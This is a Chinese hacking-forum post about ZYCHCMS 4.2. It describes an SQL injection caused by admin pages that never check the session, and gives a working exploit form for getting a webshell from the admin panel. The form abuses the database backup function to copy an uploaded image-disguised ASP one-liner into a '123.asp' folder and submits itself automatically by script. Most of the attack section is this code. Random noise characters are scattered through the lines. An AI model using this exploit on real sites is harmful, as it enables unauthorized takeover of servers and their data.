找回密码
 立即注册
查看: 2034|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 V6 L3 ~9 R" U; H! m* b

  G4 A0 y3 n4 G; J8 I3 u
& x" ?& E) C$ i5 r2 \  g. Q, U, u1 Y3 W, \$ h/ P! r8 n8 i: \
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)3 r7 e$ _* j) \7 S: S& ?; \: ^
①SQL注射漏洞* C: P6 d- H" s- [$ f# ^
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp9 o/ M9 [' q3 i* d
漏洞原因:未过滤
4 L! N1 i: V% B8 z  L+ C0 B 漏洞代码:& f) h: x) E! y. g! j
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 b' w! i* B! V( y+ ~ 修复方法:在文件开头加入代码
/ C9 [1 v( K' K8 @3 [$ r - s1 u! h3 O9 N+ Y
- u- z. X/ d0 g* {
②后台拿WBSHELL1 M- d2 y3 ^( m$ v, J5 h
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。- I( l0 {% l4 E) n2 g' ^/ |# z
这里在网上找了一个,改了下,将就着用。. y/ F9 `  ~( }8 J1 a7 |4 z1 T4 I$ N" b
以下是代码本地提交代码
; C( X  D0 m* U# e; w
" g; i5 x' _) H# l. O% @* i( x9 }2 x3 @8 X) c
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
0 N: n2 {: }# |! c2 u6 \. q$ D <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>: v! v! A' }; d
<tr>! H% f9 n; [9 K1 }6 L2 W
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>3 H2 S( c: H. Q6 K+ P! M
</tr>8 W3 ?' U, {) V+ _
<tr>
0 H7 ^0 }# g4 Q7 j& ~- s6 ? <td bgcolor=”#FFFFFF”><span class=”back_southidc”>  D5 @, s) R- }2 g4 i7 ]% f! p; i  t
</span>
0 o9 o; V. f# t7 o <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >  ?# L/ i+ l, n( f4 K6 T
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
8 A5 l  O" ~5 \6 P" r <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
# ]! p# j  H0 Y, |5 c& G# R <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
( [& [! n7 r+ C+ U. a8 P" d$ D9 }' p <div align=”left”>
7 o. g9 g1 R4 [: E <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />3 z" s1 s* F. \/ T2 o
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
8 p  J* n4 ?7 @$ v' }# u! m8 q <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
- L& p% h9 {4 W! ]  c! _ </div></td>$ p# v( p9 k3 W& R4 P* p# ?$ n" g* f  `
</tr>
1 u+ z% k0 u$ I( C& A+ ?5 @, u <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>* m% N: z! v6 `* V5 J
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
1 `# J+ s. f! [' n <td class=”td”><div align=”left”>: c& B, q' |* Y  a& {: q# G' X
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
: `+ W2 a5 g  H% z9 }% n [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
( v2 y4 x% B' J. G </tr>
: G/ J& h) i) D* h7 D" u/ C% W+ h <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
2 [7 k2 ?! |  Z: Q <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
) r# x6 N. [1 ]% h' k+ o3 ] <td class=”td”><div align=”left”>
$ @! X  F1 j! v' U <input type=”submit” value=”确定备份” class=”btn”8 D5 `# L; K7 F% p
</div></td>8 n/ ]  I5 L' u2 B6 R, o
</tr>6 l8 m1 Z2 m2 ?! c0 C" s5 }5 ^
</table></td></tr></form>' M% ]% E2 m! C' a! V
</table>' ?0 A, B; u8 J9 Y. A, @9 i
</td>
8 B0 X% P1 h+ R; F4 m2 I+ b </tr>
/ x* R/ r$ O- k4 W0 a+ X </table>
. H. f8 R3 z3 b; j! D <script>) y* j; a3 ]6 U" z
document.all.add.submit();) c6 z* a4 h, W- O, d% F6 C
</script>
( M4 y1 A- N; J' _" }8 R - A1 o. \1 n( h3 A- N
- P& q; c8 p. b1 ]4 ^5 X

1 c" T) b, w/ U1 n" }# z. C! g2 j
% p, m/ v$ ?! T! e# ~; i4 {* `) \, I; i7 h

" x/ c! d+ A: q# @6 i; H+ o; A9 U7 s# a- O2 N) f
+ b8 q& \) d% B3 V  i( B' A

( r4 E1 N) P4 y- ]: b
+ h5 J, P( r& D* D- h. l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表